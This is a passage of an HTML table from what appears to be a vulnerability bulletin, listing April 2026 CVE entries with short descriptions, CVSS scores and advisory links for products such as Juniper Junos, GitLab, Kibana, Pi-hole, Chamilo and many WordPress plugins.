    <td>A container privilege escalation flaw was found in certain Red Hat Process Automation Manager images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-58713" target="_blank" rel="noopener">CVE-2025-58713</a></td>
    <td><a href="https://access.redhat.com/security/cve/CVE-2025-58713" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2025-58713</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2394419" target="_blank" rel="noopener">RHBZ#2394419</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS Evolved</td>
    <td>A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in the advanced forwarding toolkit (evo-aftmand/evo-pfemand) of Juniper Networks Junos OS Evolved on PTX Series or QFX5000 Series allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). An attacker sending crafted multicast packets will cause line cards running evo-aftmand/evo-pfemand to crash and restart or non-line card devices to crash and restart. Continued receipt and processing of these packets will sustain the Denial of Service (DoS) condition. This issue affects Junos OS Evolved PTX Series: * All versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-EVO, * from 24.2 before 24.2R2-EVO, * from 24.4 before 24.4R2-EVO. This issue affects Junos OS Evolved on QFX5000 Series: * 22.2-EVO version before 22.2R3-S7-EVO, * 22.4-EVO version before 22.4R3-S7-EVO, * 23.2-EVO versions before 23.2R2-S4-EVO, * 23.4-EVO versions before 23.4R2-S5-EVO, * 24.2-EVO versions before 24.2R2-S1-EVO, * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does not affect Junos OS Evolved on QFX5000 Series versions before: 21.2R2-S1-EVO, 21.2R3-EVO, 21.3R2-EVO, 21.4R1-EVO, and 22.1R1-EVO.</td>
    <td>2026-04-09</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-59969" target="_blank" rel="noopener">CVE-2025-59969</a></td>
    <td><a href="https://kb.juniper.net/JSA103159" target="_blank" rel="noopener">https://kb.juniper.net/JSA103159</a></td>
    </tr>

    <tr>
    <td class="vendor-product">GitLab--GitLab</td>
    <td>GitLab has remediated an issue in GitLab EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to cause denial of service to the GitLab instance due to improper input validation in GraphQL queries.</td>
    <td>2026-04-08</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1101" target="_blank" rel="noopener">CVE-2026-1101</a></td>
    <td><a href="https://hackerone.com/reports/3460228" target="_blank" rel="noopener">HackerOne Bug Bounty Report #3460228</a><br><a href="https://gitlab.com/gitlab-org/gitlab/-/work_items/586488" target="_blank" rel="noopener">https://gitlab.com/gitlab-org/gitlab/-/work_items/586488</a><br><a href="https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/" target="_blank" rel="noopener">https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">usystemsgmbh--Webling</td>
    <td>The Webling plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.9.0 due to insufficient input sanitization, insufficient output escaping, and missing capabilities checks in the 'webling_admin_save_form' and 'webling_admin_save_memberlist' functions. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject Webling forms and memberlists with arbitrary web scripts that will execute whenever an administrator views the related form or memberlist area of the WordPress admin.</td>
    <td>2026-04-10</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1263" target="_blank" rel="noopener">CVE-2026-1263</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe0d-0709-4fa2-9294-393ddcd05b22?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe0d-0709-4fa2-9294-393ddcd05b22?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Form_List.php#L122" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Form_List.php#L122</a><br><a href="https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Memberlist_List.php#L115" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Memberlist_List.php#L115</a><br><a href="https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_form.php#L2" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_form.php#L2</a><br><a href="https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_memberlist.php#L2" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_memberlist.php#L2</a><br><a href="https://plugins.trac.wordpress.org/changeset?old_path=%2Fwebling/tags/3.9.0&new_path=%2Fwebling/tags/3.9.1" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset?old_path=%2Fwebling/tags/3.9.0&new_path=%2Fwebling/tags/3.9.1</a></td>
    </tr>

    <tr>
    <td class="vendor-product">magicplugins--Magic Conversation For Gravity Forms</td>
    <td>The Magic Conversation For Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'magic-conversation' shortcode in all versions up to, and including, 3.0.97 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1396" target="_blank" rel="noopener">CVE-2026-1396</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bc425c4a-cb4e-4f50-b85b-8c4c7778c073?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/bc425c4a-cb4e-4f50-b85b-8c4c7778c073?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/trunk/main.php#L1627" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/trunk/main.php#L1627</a><br><a href="https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/tags/3.0.96/main.php#L1627" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/tags/3.0.96/main.php#L1627</a><br><a href="https://plugins.trac.wordpress.org/changeset/3482359/magic-conversation-for-gravity-forms/trunk/main.php" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3482359/magic-conversation-for-gravity-forms/trunk/main.php</a></td>
    </tr>

    <tr>
    <td class="vendor-product">realmag777--BEAR Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net</td>
    <td>The BEAR - Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the woobe_redraw_table_row() function. This makes it possible for unauthenticated attackers to update WooCommerce product data including prices, descriptions, and other product fields via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link.</td>
    <td>2026-04-08</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1672" target="_blank" rel="noopener">CVE-2026-1672</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b5faa-1a29-4fa7-9146-d782adce0b1f?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b5faa-1a29-4fa7-9146-d782adce0b1f?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L782" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L782</a><br><a href="https://plugins.trac.wordpress.org/changeset/3457263/" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3457263/</a><br><a href="https://plugins.trac.wordpress.org/changeset/3465138/" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3465138/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">wpeverest--User Registration &amp; Membership Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</td>
    <td>The User Registration &amp; Membership - Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder plugin for WordPress is vulnerable to SQL Injection via the 'membership_ids[]' parameter in all versions up to, and including, 5.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</td>
    <td>2026-04-08</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1865" target="_blank" rel="noopener">CVE-2026-1865</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/07c79459-66b8-4c93-a1cd-6e3ede95643f?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/07c79459-66b8-4c93-a1cd-6e3ede95643f?source=cve</a><br><a href="https://plugins.trac.wordpress.org/changeset/3469042/user-registration" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3469042/user-registration</a></td>
    </tr>

    <tr>
    <td class="vendor-product">n/a--Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R) Processor J Series, Intel(R) Celeron(R) Processor N Series may allow an escalation of privilege. Hardware reverse engineer adversary with a privileged user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via physical access when attack requirements are present with special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (none) impacts.</td>
    <td>Use of Default Cryptographic Key in the hardware for some Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R) Processor J Series, Intel(R) Celeron(R) Processor N Series may allow an escalation of privilege. Hardware reverse engineer adversary with a privileged user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via physical access when attack requirements are present with special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (none) impacts.</td>
    <td>2026-04-08</td>
    <td>6.6</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-20709" target="_blank" rel="noopener">CVE-2026-20709</a></td>
    <td><a href="https://intel.com/content/www/us/en/security-center/advisory/intel-sa-00609.html" target="_blank" rel="noopener">https://intel.com/content/www/us/en/security-center/advisory/intel-sa-00609.html</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos Space</td>
    <td>An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the list filter field that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator. This issue affects all versions of Junos Space before 24.1R5 Patch V3.</td>
    <td>2026-04-09</td>
    <td>6.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21904" target="_blank" rel="noopener">CVE-2026-21904</a></td>
    <td><a href="https://kb.juniper.net/JSA106003" target="_blank" rel="noopener">https://kb.juniper.net/JSA106003</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--JSI LWC</td>
    <td>A Permissive List of Allowed Input vulnerability in the CLI of Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows a local, high privileged attacker to escalate their privileges to root. The CLI menu accepts input without carefully validating it, which allows for shell command injection. These shell commands are executed with root permissions and can be used to gain complete control of the system. This issue affects all JSI vLWC versions before 3.0.94.</td>
    <td>2026-04-09</td>
    <td>6.7</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21915" target="_blank" rel="noopener">CVE-2026-21915</a></td>
    <td><a href="https://kb.juniper.net/JSA106016" target="_blank" rel="noopener">https://kb.juniper.net/JSA106016</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Incorrect Synchronization vulnerability in the management daemon (mgd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based attacker with low privileges to cause a complete Denial-of-Service (DoS) of the management plane. When NETCONF sessions are quickly established and disconnected, a locking issue causes mgd processes to hang in an unusable state. When the maximum number of mgd processes has been reached, no new logins are possible. This leads to the inability to manage the device and requires a power-cycle to recover. This issue can be monitored by checking for mgd processes in lockf state in the output of 'show system processes extensive': user@host&gt; show system processes extensive | match mgd &lt;pid&gt; root 20 0 501M 4640K lockf 1 0:01 0.00% mgd. If the system still can be accessed (either via the CLI or as root, which might still be possible as last resort as this won't invoke mgd), mgd processes in this state can be killed with 'request system process terminate &lt;PID&gt;' from the CLI or with 'kill -9 &lt;PID&gt;' from the shell. This issue affects: Junos OS: * 23.4 versions before 23.4R2-S4, * 24.2 versions before 24.2R2-S1, * 24.4 versions before 24.4R1-S3, 24.4R2; This issue does not affect Junos OS versions before 23.4R1; Junos OS Evolved: * 23.4 versions before 23.4R2-S5-EVO, * 24.2 versions before 24.2R2-S1-EVO, * 24.4 versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does not affect Junos OS Evolved versions before 23.4R1-EVO.</td>
    <td>2026-04-09</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21919" target="_blank" rel="noopener">CVE-2026-21919</a></td>
    <td><a href="https://kb.juniper.net/JSA106019" target="_blank" rel="noopener">https://kb.juniper.net/JSA106019</a></td>
    </tr>

    <tr>
    <td class="vendor-product">addfunc--AddFunc Head &amp; Footer Code</td>
    <td>The AddFunc Head &amp; Footer Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `aFhfc_head_code`, `aFhfc_body_code`, and `aFhfc_footer_code` post meta values in all versions up to, and including, 2.3. This is due to the plugin outputting these meta values without any sanitization or escaping. While the plugin restricts its own metabox and save handler to administrators via `current_user_can('manage_options')`, it does not use `register_meta()` with an `auth_callback` to protect these meta keys. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via the WordPress Custom Fields interface that execute when an administrator previews or views the post.</td>
    <td>2026-04-10</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-2305" target="_blank" rel="noopener">CVE-2026-2305</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d1a67-1d9b-4b73-988e-085eaa7474c6?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d1a67-1d9b-4b73-988e-085eaa7474c6?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L63" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L63</a><br><a href="https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L74" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L74</a><br><a href="https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L85" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L85</a><br><a href="https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L63" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L63</a><br><a href="https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L74" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L74</a><br><a href="https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L85" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L85</a><br><a href="https://plugins.trac.wordpress.org/changeset?old_path=%2Faddfunc-head-footer-code/tags/2.3&new_path=%2Faddfunc-head-footer-code/tags/2.4" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset?old_path=%2Faddfunc-head-footer-code/tags/2.3&new_path=%2Faddfunc-head-footer-code/tags/2.4</a></td>
    </tr>

    <tr>
    <td class="vendor-product">blubrry--PowerPress Podcasting plugin by Blubrry</td>
    <td>The Blubrry PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'powerpress' and 'podcast' shortcodes in versions up to, and including, 11.15.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-2988" target="_blank" rel="noopener">CVE-2026-2988</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/de25459d-9e19-4e3e-982f-0b34fa89dc30?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/de25459d-9e19-4e3e-982f-0b34fa89dc30?source=cve</a><br><a href="https://plugins.trac.wordpress.org/changeset/3473781/powerpress" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3473781/powerpress</a></td>
    </tr>

    <tr>
    <td class="vendor-product">fernandobt--List category posts</td>
    <td>The List category posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catlist' shortcode in all versions up to, and including, 0.94.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
    <td>2026-04-09</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3005" target="_blank" rel="noopener">CVE-2026-3005</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1a93ff8a-364f-4ec4-9c32-208c7a3e1fc1?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/1a93ff8a-364f-4ec4-9c32-208c7a3e1fc1?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/list-category-posts/trunk/include/lcp-thumbnail.php#L95" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/list-category-posts/trunk/include/lcp-thumbnail.php#L95</a><br><a href="https://plugins.trac.wordpress.org/changeset/3482733/" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3482733/</a></td>
    </tr>

    <tr>
    <td class="vendor-product">uniquecodergmailcom--Pinterest Site Verification plugin using Meta Tag</td>
    <td>The Pinterest Site Verification plugin using Meta Tag plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'post_var' parameter in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3142" target="_blank" rel="noopener">CVE-2026-3142</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ccb7534-b588-4bdd-9627-0e38c0ee5e8a?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/7ccb7534-b588-4bdd-9627-0e38c0ee5e8a?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L160" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L160</a><br><a href="https://plugins.trac.wordpress.org/browser/pinterest-site-verification/trunk/PinterestMetaTagSiteVerification.php#L160" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/pinterest-site-verification/trunk/PinterestMetaTagSiteVerification.php#L160</a><br><a href="https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L172" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L172</a><br><a href="https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L180" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L180</a><br><a href="https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L92" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L92</a><br><a href="https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L132" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L132</a><br><a href="https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L214" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L214</a></td>
    </tr>

    <tr>
    <td class="vendor-product">wpchill--Strong Testimonials</td>
    <td>The Strong Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's testimonial_view shortcode in all versions up to, and including, 3.2.21 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3239" target="_blank" rel="noopener">CVE-2026-3239</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88d769cd-bea8-42e4-80a8-a77c0699b50c?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/88d769cd-bea8-42e4-80a8-a77c0699b50c?source=cve</a><br><a href="https://plugins.trac.wordpress.org/changeset/3470120/strong-testimonials" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3470120/strong-testimonials</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">posimyththemes--The Plus Addons for Elementor Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce</td>
    <td>The The Plus Addons for Elementor - Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Progress Bar shortcode in all versions up to, and including, 6.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
    <td>2026-04-08</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3311" target="_blank" rel="noopener">CVE-2026-3311</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6367c5fc-f664-4105-a1b7-a93fb0a2392b?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/6367c5fc-f664-4105-a1b7-a93fb0a2392b?source=cve</a><br><a href="https://plugins.trac.wordpress.org/changeset/3473275/the-plus-addons-for-elementor-page-builder" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3473275/the-plus-addons-for-elementor-page-builder</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the REST API stats endpoint allows any authenticated user (including low-privilege students with ROLE_USER) to read any other user's learning progress, certificates, and gradebook scores for any course, without enrollment or supervisory relationship. This vulnerability is fixed in 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33141" target="_blank" rel="noopener">CVE-2026-33141</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-j2pr-2r5w-jrpj" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-j2pr-2r5w-jrpj</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/792ba05953470ca971617fe2674ed14c1479fa80" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/792ba05953470ca971617fe2674ed14c1479fa80</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">pi-hole--web</td>
    <td>Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, a reflected DOM-based XSS vulnerability in taillog.js allows an unauthenticated attacker to inject arbitrary HTML into the Pi-hole admin interface by crafting a malicious URL. The file query parameter is interpolated into an innerHTML assignment without escaping. Because the Content-Security-Policy is missing the form-action directive, injected &lt;form&gt; elements can exfiltrate credentials to an external origin. This vulnerability is fixed in 6.5.</td>
    <td>2026-04-06</td>
    <td>6.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33403" target="_blank" rel="noopener">CVE-2026-33403</a></td>
    <td><a href="https://github.com/pi-hole/web/security/advisories/GHSA-7xqw-r9pr-qv59" target="_blank" rel="noopener">https://github.com/pi-hole/web/security/advisories/GHSA-7xqw-r9pr-qv59</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Elastic--Kibana</td>
    <td>Server-Side Request Forgery (CWE-918) in Kibana One Workflow can lead to information disclosure. An authenticated user with workflow creation and execution privileges can bypass host allowlist restrictions in the Workflows Execution Engine, potentially exposing sensitive internal endpoints and data.</td>
    <td>2026-04-08</td>
    <td>6.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33458" target="_blank" rel="noopener">CVE-2026-33458</a></td>
    <td><a href="https://discuss.elastic.co/t/kibana-9-3-3-security-update-esa-2026-28/385815" target="_blank" rel="noopener">https://discuss.elastic.co/t/kibana-9-3-3-security-update-esa-2026-28/385815</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Elastic--Kibana</td>
    <td>Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user with access to the automatic import feature can submit specially crafted requests with excessively large input values. When multiple such requests are sent concurrently, the backend services become unstable, resulting in service disruption and deployment unavailability for all users.</td>
    <td>2026-04-08</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33459" target="_blank" rel="noopener">CVE-2026-33459</a></td>
    <td><a href="https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-26/385814" target="_blank" rel="noopener">https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-26/385814</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38.</td>
    <td>2026-04-10</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33708" target="_blank" rel="noopener">CVE-2026-33708</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">pi-hole--pi-hole</td>
    <td>Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Version 6.4 has a local privilege-escalation vulnerability that allows code execution as root from the low-privilege pihole account. Important context: the pihole account uses nologin, so this is not a direct interactive-login issue. However, nologin does not prevent code from running as UID pihole if a Pi-hole component is compromised. In that realistic post-compromise scenario, attacker-controlled content in /etc/pihole/versions is sourced by root-run Pi-hole scripts, leading to root code execution. This vulnerability is fixed in 6.4.1.</td>
    <td>2026-04-06</td>
    <td>6.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33727" target="_blank" rel="noopener">CVE-2026-33727</a></td>
    <td><a href="https://github.com/pi-hole/pi-hole/security/advisories/GHSA-c935-8g63-qp74" target="_blank" rel="noopener">https://github.com/pi-hole/pi-hole/security/advisories/GHSA-c935-8g63-qp74</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
